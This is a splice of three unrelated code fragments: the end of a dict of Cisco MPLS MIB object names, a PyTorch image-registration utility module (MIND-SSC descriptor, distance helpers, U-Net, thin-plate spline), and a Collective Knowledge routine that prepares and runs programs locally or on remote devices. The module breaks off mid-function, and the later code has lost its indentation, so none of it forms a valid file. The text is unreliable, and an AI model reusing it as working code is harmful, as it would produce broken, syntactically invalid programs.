"9": {},
},
"cmplsFrrFacRouteDBEntry": {"7": {}, "8": {}, "9": {}},
"cmplsFrrMIB.1.1": {},
"cmplsFrrMIB.1.10": {},
"cmplsFrrMIB.1.11": {},
"cmplsFrrMIB.1.12": {},
"cmplsFrrMIB.1.13": {},
"cmplsFrrMIB.1.14": {},
"cmplsFrrMIB.1.2": {},
"cmplsFrrMIB.1.3": {},
"cmplsFrrMIB.1.4": {},
"cmplsFrrMIB.1.5": {},
"cmplsFrrMIB.1.6": {},
"cmplsFrrMIB.1.7": {},
"cmplsFrrMIB.1.8": {},
"cmplsFrrMIB.1.9": {},
"cmplsFrrMIB.10.9.2.1.2": {},
"cmplsFrrMIB.10.9.2.1.3": {},
"cmplsFrrMIB.10.9.2.1.4": {},
"cmplsFrrMIB.10.9.2.1.5": {},
"cmplsFrrMIB.10.9.2.1.6": {},
"cmplsNodeConfigGlobalId": {},
"cmplsNodeConfigIccId": {},
"cmplsNodeConfigNodeId": {},
"cmplsNodeConfigRowStatus": {},
"cmplsNodeConfigStorageType": {},
"cmplsNodeIccMapLocalId": {},
"cmplsNodeIpMapLocalId": {},
"cmplsTunnelExtDestTnlIndex": {},
"cmplsTunnelExtDestTnlLspIndex": {},
"cmplsTunnelExtDestTnlValid": {},
"cmplsTunnelExtOppositeDirTnlValid": {},
"cmplsTunnelOppositeDirPtr": {},
"cmplsTunnelReversePerfBytes": {},
"cmplsTunnelReversePerfErrors": {},
"cmplsTunnelReversePerfHCBytes": | |
import nibabel as nib
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import matplotlib.pyplot as plt
import os
import math
import struct
import csv
import time
def gpu_usage():
    """Print the current and peak CUDA memory allocated by tensors, in GB."""
    current_gb = torch.cuda.memory_allocated() * 1e-9
    peak_gb = torch.cuda.max_memory_allocated() * 1e-9
    print('gpu usage (current/max): {:.2f} / {:.2f} GB'.format(current_gb, peak_gb))
def pdist_squared(x):
    """Pairwise squared Euclidean distances between the columns of x.

    x: (B, D, N) tensor holding N points of D coordinates per batch item.
    Returns a (B, N, N) tensor; NaNs are zeroed and negative round-off is
    clamped to zero.
    """
    sq_norms = x.pow(2).sum(dim=1, keepdim=True)            # (B, 1, N)
    gram = torch.bmm(x.transpose(1, 2), x)                  # (B, N, N)
    dist = sq_norms.transpose(1, 2) + sq_norms - 2.0 * gram
    dist[torch.isnan(dist)] = 0                             # NaN -> 0, as before
    return dist.clamp(min=0.0)
def MINDSSC(img, radius=2, dilation=2):
    """Compute the 12-channel MIND-SSC self-similarity descriptor of a 3D volume.

    img: 5D tensor (batch, 1, D, H, W); requires a CUDA device, since the
    shift kernels below are created with .cuda().
    radius: half-width of the patch used for the patch-SSD average pooling.
    dilation: spacing of the self-similarity shift sampling.
    Returns a (batch, 12, D, H, W) descriptor tensor with values in (0, 1].
    """
    # see http://mpheinrich.de/pub/miccai2013_943_mheinrich.pdf for details on the MIND-SSC descriptor
    # kernel size
    kernel_size = radius * 2 + 1
    # define start and end locations for self-similarity pattern
    six_neighbourhood = torch.Tensor([[0,1,1],
                                      [1,1,0],
                                      [1,0,1],
                                      [1,1,2],
                                      [2,1,1],
                                      [1,2,1]]).long()
    # squared distances
    dist = pdist_squared(six_neighbourhood.t().unsqueeze(0)).squeeze(0)
    # define comparison mask: keep the 12 ordered neighbour pairs at squared distance 2
    x, y = torch.meshgrid(torch.arange(6), torch.arange(6),indexing='ij')
    mask = ((x > y).view(-1) & (dist == 2).view(-1))
    # build kernel: one-hot 3x3x3 conv kernels that extract each shifted voxel
    idx_shift1 = six_neighbourhood.unsqueeze(1).repeat(1,6,1).view(-1,3)[mask,:]
    idx_shift2 = six_neighbourhood.unsqueeze(0).repeat(6,1,1).view(-1,3)[mask,:]
    mshift1 = torch.zeros(12, 1, 3, 3, 3).cuda()
    mshift1.view(-1)[torch.arange(12) * 27 + idx_shift1[:,0] * 9 + idx_shift1[:, 1] * 3 + idx_shift1[:, 2]] = 1
    mshift2 = torch.zeros(12, 1, 3, 3, 3).cuda()
    mshift2.view(-1)[torch.arange(12) * 27 + idx_shift2[:,0] * 9 + idx_shift2[:, 1] * 3 + idx_shift2[:, 2]] = 1
    rpad1 = nn.ReplicationPad3d(dilation)
    rpad2 = nn.ReplicationPad3d(radius)
    # compute patch-ssd: squared difference of the two shifted copies, averaged over the patch
    ssd = F.avg_pool3d(rpad2((F.conv3d(rpad1(img), mshift1, dilation=dilation) - F.conv3d(rpad1(img), mshift2, dilation=dilation)) ** 2), kernel_size, stride=1)
    # MIND equation: subtract per-voxel minimum, normalise by (clamped) variance, exponentiate
    mind = ssd - torch.min(ssd, 1, keepdim=True)[0]
    mind_var = torch.mean(mind, 1, keepdim=True)
    mind_var = torch.clamp(mind_var, mind_var.mean()*0.001, mind_var.mean()*1000)
    mind /= mind_var
    mind = torch.exp(-mind)
    #permute to have same ordering as C++ code
    mind = mind[:, torch.Tensor([6, 8, 1, 11, 2, 10, 0, 7, 9, 4, 5, 3]).long(), :, :, :]
    return mind
def mind_loss(x, y):
    """Mean squared difference between the MIND-SSC descriptors of x and y."""
    descriptor_diff = MINDSSC(x) - MINDSSC(y)
    return descriptor_diff.pow(2).mean()
def pdist(x, p=2):
    """Pairwise distances between the rows of each batch element of x.

    Parameters:
        x: tensor of shape (B, N, D) — B batches of N points in D dimensions.
        p: 1 for Manhattan distance, 2 for *squared* Euclidean distance
           (the p=2 result is not square-rooted; its diagonal is explicitly
           zeroed to remove floating-point round-off).

    Returns:
        (B, N, N) tensor of pairwise distances.

    Raises:
        ValueError: for any p other than 1 or 2 (previously other values
        fell through and raised a confusing NameError on `dist`).
    """
    if p == 1:
        # Fix: sum over the coordinate axis (dim=3), matching pdist2.
        # The original summed over dim=2 and returned a (B, N, D) tensor.
        dist = torch.abs(x.unsqueeze(2) - x.unsqueeze(1)).sum(dim=3)
    elif p == 2:
        xx = (x**2).sum(dim=2).unsqueeze(2)
        yy = xx.permute(0, 2, 1)
        dist = xx + yy - 2.0 * torch.bmm(x, x.permute(0, 2, 1))
        # self-distance is exactly zero; wipe numerical noise on the diagonal
        dist[:, torch.arange(dist.shape[1]), torch.arange(dist.shape[2])] = 0
    else:
        raise ValueError('pdist only supports p=1 or p=2, got p=%r' % (p,))
    return dist
def pdist2(x, y, p=2):
    """Pairwise distances between rows of x (B, N, D) and rows of y (B, M, D).

    Parameters:
        p: 1 for Manhattan distance, 2 for *squared* Euclidean distance
           (not square-rooted and not clamped, so tiny negative round-off
           values are possible for p=2).

    Returns:
        (B, N, M) tensor of pairwise distances.

    Raises:
        ValueError: for any p other than 1 or 2 (previously other values
        fell through and raised a confusing NameError on `dist`).
    """
    if p == 1:
        dist = torch.abs(x.unsqueeze(2) - y.unsqueeze(1)).sum(dim=3)
    elif p == 2:
        xx = (x**2).sum(dim=2).unsqueeze(2)
        yy = (y**2).sum(dim=2).unsqueeze(1)
        dist = xx + yy - 2.0 * torch.bmm(x, y.permute(0, 2, 1))
    else:
        raise ValueError('pdist2 only supports p=1 or p=2, got p=%r' % (p,))
    return dist
def knn_graph(kpts, k, include_self=False):
    """Symmetric k-nearest-neighbour graph over keypoints.

    Parameters:
        kpts: (B, N, D) keypoint coordinates.
        k: number of neighbours per node.
        include_self: if True, a node counts as its own nearest neighbour.

    Returns:
        ind: (B, N, k) neighbour indices per node.
        dist * A: (B, N, N) squared distances masked to graph edges.
        A: (B, N, N) symmetric 0/1 adjacency matrix.

    Fix: the original indexed `ind[0]` when filling A, so for B > 1 every
    batch element reused batch 0's neighbours; adjacency is now built
    per batch with scatter_.
    """
    B, N, D = kpts.shape
    device = kpts.device
    dist = pdist(kpts)  # (B, N, N) squared distances, zero diagonal
    # take k+1 nearest and drop the self column unless include_self
    ind = (-dist).topk(k + (1 - int(include_self)), dim=-1)[1][:, :, 1 - int(include_self):]
    A = torch.zeros(B, N, N, device=device)
    A.scatter_(2, ind, 1.0)              # directed edges n -> neighbour
    A = torch.max(A, A.transpose(1, 2))  # symmetrize: keep edge if either direction selected
    return ind, dist * A, A
def laplacian(kpts, k, lambd, sigma=0):
    """Regularised graph Laplacian of the kNN graph over kpts (batch size 1).

    Edge weights are lambd on each kNN edge, optionally attenuated by a
    Gaussian of the squared edge distance when sigma > 0. Returns
    (L, W) where L = diag(W.sum(1) + 1) - W, each with a leading batch dim.
    """
    _, graph_dist, adjacency = knn_graph(kpts, k)
    weights = lambd * adjacency.squeeze(0)
    if sigma > 0:
        weights = weights * torch.exp(- graph_dist.squeeze(0) / (sigma ** 2))
    degree = weights.sum(1) + 1
    lap = torch.diag(degree) - weights
    return lap.unsqueeze(0), weights.unsqueeze(0)
def dice_coeff(outputs, labels, max_label):
    """Per-label Dice overlap between two integer label volumes.

    Labels 1 .. max_label-1 are scored (background label 0 is skipped).
    Returns a float32 tensor of length max_label - 1; 1e-8 in the
    denominator guards against empty labels.
    """
    scores = torch.zeros(max_label - 1)
    for lbl in range(1, max_label):
        pred = (outputs == lbl).view(-1).float()
        target = (labels == lbl).view(-1).float()
        overlap = (pred * target).mean()
        scores[lbl - 1] = (2. * overlap) / (1e-8 + pred.mean() + target.mean())
    return scores
def default_unet_features():
    """Default per-layer convolution feature counts for the U-Net."""
    encoder_feats = [32, 48, 48, 64]
    decoder_feats = [64, 48, 48, 48, 48, 32, 64]
    return [encoder_feats, decoder_feats]
class Unet(nn.Module):
    """
    A unet architecture. Layer features can be specified directly as a list of encoder and decoder
    features or as a single integer along with a number of unet levels. The default network features
    per layer (when no options are specified) come from default_unet_features():
        encoder: [32, 48, 48, 64]
        decoder: [64, 48, 48, 48, 48, 32, 64]
    """
    def __init__(self,ConvBlock,
                 inshape=None,
                 infeats=None,
                 nb_features=None,
                 nb_levels=None,
                 max_pool=2,
                 feat_mult=1,
                 nb_conv_per_level=1,
                 half_res=False):
        """
        Parameters:
            ConvBlock: factory called as ConvBlock(ndims, in_feats, out_feats); used for every
                encoder, decoder and remaining convolution in the network.
            inshape: Input shape. e.g. (192, 192, 192)
            infeats: Number of input features.
            nb_features: Unet convolutional features. Can be specified via a list of lists with
                the form [[encoder feats], [decoder feats]], or as a single integer.
                If None (default), the unet features are defined by the default config described in
                the class documentation.
            nb_levels: Number of levels in unet. Only used when nb_features is an integer.
                Default is None.
            max_pool: Pooling/upsampling factor, as a single int for all levels or one per level.
                Default is 2.
            feat_mult: Per-level feature multiplier. Only used when nb_features is an integer.
                Default is 1.
            nb_conv_per_level: Number of convolutions per unet level. Default is 1.
            half_res: Skip the last decoder upsampling. Default is False.
        """
        super().__init__()
        # ensure correct dimensionality
        ndims = len(inshape)
        assert ndims in [1, 2, 3], 'ndims should be one of 1, 2, or 3. found: %d' % ndims
        # cache some parameters
        self.half_res = half_res
        # default encoder and decoder layer features if nothing provided
        if nb_features is None:
            nb_features = default_unet_features()
        # build feature list automatically
        if isinstance(nb_features, int):
            if nb_levels is None:
                raise ValueError('must provide unet nb_levels if nb_features is an integer')
            # geometric growth: nb_features * feat_mult**level, one entry per conv per level
            feats = np.round(nb_features * feat_mult ** np.arange(nb_levels)).astype(int)
            nb_features = [
                np.repeat(feats[:-1], nb_conv_per_level),
                np.repeat(np.flip(feats), nb_conv_per_level)
            ]
        elif nb_levels is not None:
            raise ValueError('cannot use nb_levels if nb_features is not an integer')
        # extract any surplus (full resolution) decoder convolutions
        enc_nf, dec_nf = nb_features
        nb_dec_convs = len(enc_nf)
        final_convs = dec_nf[nb_dec_convs:]
        dec_nf = dec_nf[:nb_dec_convs]
        self.nb_levels = int(nb_dec_convs / nb_conv_per_level) + 1
        if isinstance(max_pool, int):
            max_pool = [max_pool] * self.nb_levels
        # cache downsampling / upsampling operations
        # NOTE(review): these are plain Python lists, not nn.ModuleList — works because the
        # modules are parameter-free, but they will not appear in self.modules(); confirm intended
        MaxPooling = getattr(nn, 'MaxPool%dd' % ndims)
        self.pooling = [MaxPooling(s) for s in max_pool]
        self.upsampling = [nn.Upsample(scale_factor=s, mode='nearest') for s in max_pool]
        # configure encoder (down-sampling path)
        prev_nf = infeats
        encoder_nfs = [prev_nf]
        self.encoder = nn.ModuleList()
        for level in range(self.nb_levels - 1):
            convs = nn.ModuleList()
            for conv in range(nb_conv_per_level):
                nf = enc_nf[level * nb_conv_per_level + conv]
                convs.append(ConvBlock(ndims, prev_nf, nf))
                prev_nf = nf
            self.encoder.append(convs)
            encoder_nfs.append(prev_nf)
        # configure decoder (up-sampling path)
        encoder_nfs = np.flip(encoder_nfs)
        self.decoder = nn.ModuleList()
        for level in range(self.nb_levels - 1):
            convs = nn.ModuleList()
            for conv in range(nb_conv_per_level):
                nf = dec_nf[level * nb_conv_per_level + conv]
                convs.append(ConvBlock(ndims, prev_nf, nf))
                prev_nf = nf
            self.decoder.append(convs)
            # account for the skip connection concatenated in forward()
            if not half_res or level < (self.nb_levels - 2):
                prev_nf += encoder_nfs[level]
        # now we take care of any remaining convolutions
        self.remaining = nn.ModuleList()
        for num, nf in enumerate(final_convs):
            self.remaining.append(ConvBlock(ndims, prev_nf, nf))
            prev_nf = nf
        # cache final number of features
        self.final_nf = prev_nf
    def forward(self, x):
        """Encoder/decoder pass with skip connections; returns the final feature map."""
        # encoder forward pass
        x_history = [x]
        for level, convs in enumerate(self.encoder):
            for conv in convs:
                x = conv(x)
            x_history.append(x)
            x = self.pooling[level](x)
        # decoder forward pass with upsampling and concatenation
        for level, convs in enumerate(self.decoder):
            for conv in convs:
                x = conv(x)
            if not self.half_res or level < (self.nb_levels - 2):
                x = self.upsampling[level](x)
                x = torch.cat([x, x_history.pop()], dim=1)
        # remaining convs at full resolution
        for conv in self.remaining:
            x = conv(x)
        return x
def countParameters(model):
    """Return the number of trainable (requires_grad) parameters in a model.

    Uses Tensor.numel(), so 0-d (scalar) parameters count as 1; the previous
    np.prod(p.size()) returned the float 1.0 for an empty size, silently
    promoting the total to a float.
    """
    return sum(p.numel() for p in model.parameters() if p.requires_grad)
class TPS:
    """3D thin-plate-spline interpolation with an affine term."""
    @staticmethod
    def fit(c, f, lambd=0.):
        """Solve for spline coefficients mapping control points c (n, 3) to values f (n, f_dim).

        lambd regularises the kernel block (lambd=0 gives exact interpolation).
        Returns theta of shape (n+4, f_dim): n kernel weights followed by 4
        affine coefficients.
        """
        device = c.device
        n = c.shape[0]
        # radial kernel matrix, regularised on the diagonal
        K = TPS.u(TPS.d(c, c)) + lambd * torch.eye(n, device=device)
        # affine part: homogeneous coordinates [1, x, y, z]
        P = torch.cat((torch.ones((n, 1), device=device), c), dim=1)
        # assemble the (n+4, n+4) block system [[K, P], [P^T, 0]]
        top = torch.cat((K, P), dim=1)
        bottom = torch.cat((P.t(), torch.zeros((4, 4), device=device)), dim=1)
        A = torch.cat((top, bottom), dim=0)
        rhs = torch.cat((f, torch.zeros((4, f.shape[1]), device=device)), dim=0)
        return torch.linalg.solve(A, rhs)
    @staticmethod
    def d(a, b):
        """Pairwise Euclidean distances between rows of a and rows of b."""
        sq = (a ** 2).sum(dim=1).view(-1, 1) + (b ** 2).sum(dim=1).view(1, -1)
        sq = sq - 2.0 * torch.mm(a, b.t())
        return torch.sqrt(sq.clamp(0.0, float('inf')))
    @staticmethod
    def u(r):
        """TPS radial basis r^2 * log(r); the 1e-6 offset guards log(0)."""
        return r.pow(2) * torch.log(r + 1e-6)
    @staticmethod
    def z(x, c, theta):
        """Evaluate the fitted spline at query points x (m, 3)."""
        w, a = theta[:-4], theta[-4:].unsqueeze(2)
        nonlinear = torch.matmul(TPS.u(TPS.d(x, c)), w)                       # (m, f_dim)
        affine = a[0] + a[1] * x[:, 0] + a[2] * x[:, 1] + a[3] * x[:, 2]      # (f_dim, m)
        return (affine + nonlinear.t()).t()
def thin_plate_dense(x1, y1, shape, step, lambd=.0, unroll_step_size=2**12):
device = x1.device
D, H, W = shape
D1, H1, W1 = D//step, H//step, W//step
x2 = F.affine_grid(torch.eye(3, 4, device=device).unsqueeze(0), (1, 1, D1, H1, W1), align_corners=True).view(-1, 3)
tps = TPS()
theta = tps.fit(x1[0], y1[0], lambd)
y2 = torch.zeros((1, D1 * H1 * W1, 3), device=device)
N = D1*H1*W1
n = math.ceil(N/unroll_step_size)
for j in range(n):
j1 = j * unroll_step_size
j2 = min((j + 1) * unroll_step_size, N)
y2[0, j1:j2, :] = tps.z(x2[j1:j2], x1[0], theta)
| |
ck.out(y)
ck.out('')
ry=os.system(y)
if tosd.get('delete_file_extra','')!='':
y=tosd['delete_file_extra']+df+' '+rse
if o=='con':
ck.out('')
ck.out(y)
ck.out('')
ry=os.system(y)
if os.path.isfile(df):
os.remove(df)
elif os.path.isdir(df):
shutil.rmtree(df,ignore_errors=True)
# Delete global directories locally (needed for ARM WA)
for df in meta.get('clean_dirs',[]):
if df!='':
if o=='con':
ck.out('')
ck.out(' Removing directory '+df+' ...')
ck.out('')
shutil.rmtree(df,ignore_errors=True)
new_directories = rt.get('run_make_directories',[]);
if len(new_directories)>0:
if o=='con':
ck.out(' Creating new directories:')
for new_dir in new_directories:
if remote=='yes':
x=rs+' '+tosd['make_dir']+rdir+new_dir+' '+rse
if o=='con':
ck.out('')
ck.out('Executing: '+x)
r=os.system(x)
else:
shutil.rmtree(new_dir,ignore_errors=True)
os.mkdir(new_dir)
if o=='con': ck.out('')
if sc!='yes' and 'CT_REPEAT_MAIN' in run_vars:
if o=='con':
ck.out(sep)
ck.out('### Calibration '+str(cn)+' out of '+xcn_max+' ; Kernel repeat number = '+str(repeat))
sb=csb
if sc!='yes' and 'CT_REPEAT_MAIN' in run_vars and repeat!=-1:
sb=sb.replace('$#repeat#$', str(repeat))
env['CT_REPEAT_MAIN']=str(repeat)
# Check sudo init
if isd=='yes':
if o=='con':
ck.out(sep)
ck.out(' (preparing sudo - may ask password ...)')
if remote!='yes':
os.system(sudo_init)
if o=='con': ck.out(sep)
# Prepare tmp batch file with run instructions
if rbn=='':
rx=ck.gen_tmp_file({'prefix':'tmp-', 'suffix':sext, 'remove_dir':'yes'})
if rx['return']>0: return rx
fn=rx['file_name']
else:
fn=rbn
xbbp=bbp
if remote=='yes':
xbbp=bbpt
if xbbp!='':
sb=bbp+'\n\n'+sb
rx=ck.save_text_file({'text_file':fn, 'string':sb})
if rx['return']>0: return rx
# Prepare execution
if remote=='yes' and meta.get('run_via_third_party','')!='yes':
# Copy above batch file to remote device
y=tosd.get('remote_push','').replace('$#device#$',xtdid)
y=y.replace('$#file1#$', fn)
y=y.replace('$#file2#$', rdir+fn)
if o=='con':
ck.out(sep)
ck.out(y)
ck.out('')
ry=os.system(y)
if ry>0:
return {'return':1, 'error':'copying to remote device failed'}
# Prepare command line for remote device
y=''
if isd=='yes':
y+=sudo_init+' '+envtsep
y+=sudo_pre+' '+envtsep
y+=tosd.get('interpreter','')+' '+stbp+fn
# x=sb.split('\n')
# for q in x:
# if q!='':
# if y!='': y+=envtsep
# y+=' '+q
if isd=='yes': y=y+' '+envtsep+' '+sudo_post
eifsx1=eifsx
if rs.endswith('"'):
eifsx1=''
elif eifsx!='':
y=y.replace('"','\\"')
yrdir=rdir
if tosd.get('remote_dir_full','')!='':
yrdir=tosd['remote_dir_full']+stdirs+rdir
y=rs+' '+eifsx1+tosd['change_dir']+' '+yrdir+envtsep+' '+y
# Current behaviour on android is to redirect back to the host machine.
# This can result in a significant amount of data transferred. On some devices
# this has caused the adb client to crash. Proposal is to redirect to device and
# transfer back as a normal run_cmd_out file.
# Many options for redirecting to target as all seem to be valid levels to make this choice
rtt=tosd.get('redirect_to_target','')=='yes' or meta.get('redirect_to_target','')=='yes' or rt.get('redirect_to_target','')=='yes'
if not rtt:
y+=eifsx1+' '+rse
if cons!='yes':
if ercmd!='': y+=' '+ercmd
if rco1!='': y+=' '+stro+' '+rco1
if rco2!='': y+=' '+stre+' '+rco2
# Delay command end to after redirects
if rtt:
y+=eifsx1+' '+rse
# if o=='con':
# ck.out(y)
else:
y=''
if sexe!='':
y+=sexe+' '+sbp+fn+envsep
if isd=='yes':
yy=sudo_pre+' '+sbp+fn+' '+envtsep+' '+sudo_post
else:
yy=scall+' '+sbp+fn
y+=' '+yy
if remote!='yes' and ubtr!='': y=ubtr.replace('$#cmd#$',y)
if o=='con':
ck.out(sep)
ck.out('Prepared script:')
ck.out('')
ck.out(sb)
ck.out(sep)
ck.out(' ('+y.strip()+')')
if o=='con':
ck.out('')
ck.out(' (sleep 0.5 sec ...)')
time.sleep(0.5)
ck.out('')
ck.out(' (run ...)')
############################################## Running code here ##############################################
sys.stdout.flush()
start_time1=time.time()
rx=0
rry=0
if skip_exec!='yes':
ry=ck.system_with_timeout({'cmd':y, 'timeout':xrto})
rry=ry['return']
if rry>0:
if rry!=8: return ry
else:
rx=ry['return_code']
elif o=='con':
ck.out('')
ck.out(' * skiped execution ... *')
exec_time=time.time()-start_time1
# Hack to fix occasional strange effect when time.time() is 0
if exec_time<0: exec_time=-exec_time
if sca!='yes':
if fn!='' and os.path.isfile(fn): os.remove(fn)
# Pull files from the device if remote
if remote=='yes':
xrof=rof
if i.get('pull_only_timer_files','')=='yes':
xrof=[fgtf]
for df in xrof:
# Pull output files from device
df0, df1 = os.path.split(df)
# Push data files to device
y=tosd['remote_pull'].replace('$#device#$',xtdid)
y=y.replace('$#file1#$', rdir+df)
y=y.replace('$#file1s#$', df1)
y=y.replace('$#file2#$', df)
if o=='con':
ck.out('')
ck.out(y)
ck.out('')
ry=os.system(y)
y=tosd.get('remote_pull_post','').replace('$#device#$',xtdid)
if y!='':
y=y.replace('$#file1#$', rdir+df)
y=y.replace('$#file1s#$', df1)
y=y.replace('$#file2#$', df)
if o=='con':
ck.out(sep)
ck.out(y)
ck.out('')
ry=os.system(y)
if ry>0:
return {'return':1, 'error':'pulling from remote device failed'}
# Check if print files
pfar=vcmd.get('print_files_after_run',[])
if len(pfar)==0:
pfar=meta.get('print_files_after_run',[])
if len(pfar)>0 and sfp!='yes' and o=='con' and not b_min_run:
ck.out('')
ck.out(' (printing output files) ')
for q in pfar:
ck.out('')
ck.out(' * '+q)
ck.out('')
rz=ck.load_text_file({'text_file':q, 'split_to_list':'yes', 'encoding':sys.stdout.encoding})
if rz['return']==0:
lxx=rz['lst']
for q1 in lxx:
ck.out(' '+q1)
# Check if post-processing script from CMD
if pp_uoa!='' and skip_exec!='yes' and not b_min_run:
if o=='con':
ck.out('')
ck.out(' (post processing from script '+pp_uoa+' / '+pp_name+' ... )"')
ck.out('')
iz={'action':'run',
'module_uoa':cfg['module_deps']['script'],
'data_uoa':pp_uoa,
'name':pp_name,
'params':pp_params}
rz=ck.access(iz)
if rz['return']>0: return rz
# For now ignore output
# Check if post-processing script
srx=0 # script exit code
# Newer variant (more consistent with pre_process_via_ck
if type(lppcvc)==dict and len(lppcvc)>0 and skip_exec!='yes' and not b_min_run:
pvck=lppcvc
pvckp=src_path_local
pvckm=pvck.get('module_uoa','')
if pvckm=='': pvckm=work['self_module_uid']
pvckd=pvck.get('data_uoa','')
if pvckd!='':
rp=ck.access({'action':'find',
'module_uoa':pvckm,
'data_uoa':pvckd})
if rp['return']>0: return rp
pvckp=rp['path']
pvckc=pvck.get('script_name','')
if pvckc=='': pvckc='postprocess'
if o=='con':
ck.out('')
ck.out(' (post processing via CK ('+pvckp+', '+pvckc+')')
ck.out('')
# Check if has custom script
try:
cdd=os.getcwd()
except OSError:
os.chdir('..')
cdd=os.getcwd()
cs=None
rxx=ck.load_module_from_path({'path':pvckp, 'module_code_name':pvckc, 'skip_init':'yes'})
cs=rxx.get('code', None)
if cs==None:
rxx['return']=1
rxx['error']='problem loading python code: '+rxx['error']
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']=rxx['error']
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
if rxx['return']==0:
os.chdir(cdd) # restore current dir from above operation
if cs!=None and 'ck_check_output' in dir(cs):
ck_check_output=cs.ck_check_output
if cs!=None and 'ck_postprocess' in dir(cs):
as_cmd=False
# Call customized script
ii={"host_os_uoa":hosx,
"host_os_uid":hos,
"host_os_dict":hosd,
"target_os_uoa":tosx,
"target_os_uid":tos,
"target_os_dict":tosd,
"target_device_id":tdid,
"ck_kernel":ck,
"misc":misc,
"meta":meta,
"deps":deps,
"env":env,
"dataset_uoa":dduoa,
"dataset_file":dfile,
"dataset_path":dp,
"dataset_meta":dset,
"run_time":rt,
"params":params,
"device_cfg":device_cfg,
"out":oo
}
rxx=cs.ck_postprocess(ii)
srx=rxx['return']
if srx==0:
xchars=rxx.get('characteristics',{})
if len(xchars)>0:
et=xchars.get('execution_time','')
if et!='':
exec_time=float(et)
ccc.update(xchars)
if len(rxx.get('misc',{}))>0:
misc.update(rxx['misc'])
else:
if o=='con':
ck.out(' (post processing script failed: '+rxx['error']+'!)')
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']=rxx['error']
# break
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
# Older variant
if len(lppc)>0 and skip_exec!='yes' and not b_min_run:
for ppc in lppc:
while ppc.find('$<<')>=0:
j1=ppc.find('$<<')
j2=ppc.find('>>$')
if j2>0:
j3=ppc[j1+3:j2]
ppc=ppc[:j1]+env.get(j3,'')+ppc[j2+3:]
ppc=ppc.replace('$<<',svarb).replace('>>$',svare)
ppc=ppc.replace('$#dir_sep#$',stdirs)
ppc=ppc.replace('$#src_path_local#$', src_path_local).replace('$#src_path#$', src_path)
# Post-processing is performed on the local machine, so dataset path should be local, not remote!
# if remote=='yes':
# ppc=ppc.replace('$#dataset_path#$','')
# elif dp!='':
ppc=ppc.replace('$#dataset_path#$',dp+sdirs)
r9=substitute_some_ck_keys({'string':ppc})
if r9['return']>0: return r9
ppc=r9['string']
if o=='con':
ck.out('')
ck.out(' (post processing: "'+ppc+'"')
ck.out('')
# Check if via CK, otherwise run as system
if lppcvc=='yes':
ppcs=ppc.split()
if len(ppcs)>1:
if ppcs[0].startswith('python'):
ppcm=ppcs[1]
ppcm1=os.path.basename(ppcm)
ppcm2=os.path.dirname(ppcm)
if ppcm1.endswith('.py'):
ppcm1=ppcm1[:-3]
# Check if has custom script
try:
cdd=os.getcwd()
except OSError:
os.chdir('..')
cdd=os.getcwd()
cs=None
rxx=ck.load_module_from_path({'path':ppcm2, 'module_code_name':ppcm1, 'skip_init':'yes'})
if rxx['return']>0:
if o=='con':
ck.out(' (post processing script failed: '+rxx['error']+'!)')
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']=rxx['error']
# break
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
cs=rxx['code']
os.chdir(cdd) # restore current dir from above operation
if cs!=None and 'ck_check_output' in dir(cs):
ck_check_output=cs.ck_check_output
if cs!=None and 'ck_postprocess' in dir(cs):
as_cmd=False
# Call customized script
ii={"host_os_uoa":hosx,
"host_os_uid":hos,
"host_os_dict":hosd,
"target_os_uoa":tosx,
"target_os_uid":tos,
"target_os_dict":tosd,
"target_device_id":tdid,
"ck_kernel":ck,
"misc":misc,
"meta":meta,
"deps":deps,
"env":env,
"dataset_uoa":dduoa,
"dataset_file":dfile,
"dataset_path":dp,
"dataset_meta":dset,
"run_time":rt,
"params":params,
"device_cfg":device_cfg,
"out":oo
}
rxx=cs.ck_postprocess(ii)
srx=rxx['return']
if srx==0:
xchars=rxx.get('characteristics',{})
if len(xchars)>0:
et=xchars.get('execution_time','')
if et!='':
exec_time=float(et)
ccc.update(xchars)
if len(rxx.get('misc',{}))>0:
misc.update(rxx['misc'])
else:
if o=='con':
ck.out(' (post processing script failed: '+rxx['error']+'!)')
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']=rxx['error']
# break
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
else:
srx=os.system(ppc)
# If error code > 0, set as the error code of the main program and quit
if srx>0:
if o=='con':
ck.out(' (post processing script failed!)')
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']='post processing script failed'
# break
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
# If script failed, exit
if srx>0:
# break
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
# Check if fine-grain time
if fgtf!='' and skip_exec!='yes' and not b_min_run:
if o=='con':
ck.out('')
ck.out(' (reading fine grain timers from '+fgtf+' ...)')
ck.out('')
rq=ck.load_json_file({'json_file':fgtf})
if rq['return']>0:
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']=rq['error']
ccc['return_code']=rx
if o=='con':
ck.out('')
ck.out('Program execution likely failed (can\'t find fine grain timers)!')
ck.out('')
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
drq=rq['dict']
ccc.update(drq)
et=drq.get('execution_time','')
exec_time=0.0
if et!='':
exec_time=float(et)
if o=='con' and not skip_print_timers:
import json
ck.out(json.dumps(drq, indent=2, sort_keys=True))
ck.out('')
# If return code >0 and program does not ignore return code, quit
if (rx>0 and \
vcmd.get('ignore_return_code','').lower()!='yes' and \
meta.get('ignore_return_code','').lower()!='yes') or rry>0:
break
# Check calibration
if sc=='yes' or repeat==-1 or 'CT_REPEAT_MAIN' not in run_vars:
calibrate_success=True
break
orepeat=repeat
if exec_time<0.5: repeat*=10
elif 0.8<(calibrate_time/exec_time)<1.4:
calibrate_success=True
break
else:
repeat*=float(calibrate_time/exec_time)
if repeat<1: repeat=1
repeat=int(repeat)
if repeat==orepeat:
calibrate_success=True
break
if o=='con' and sc!='yes':
ck.out('')
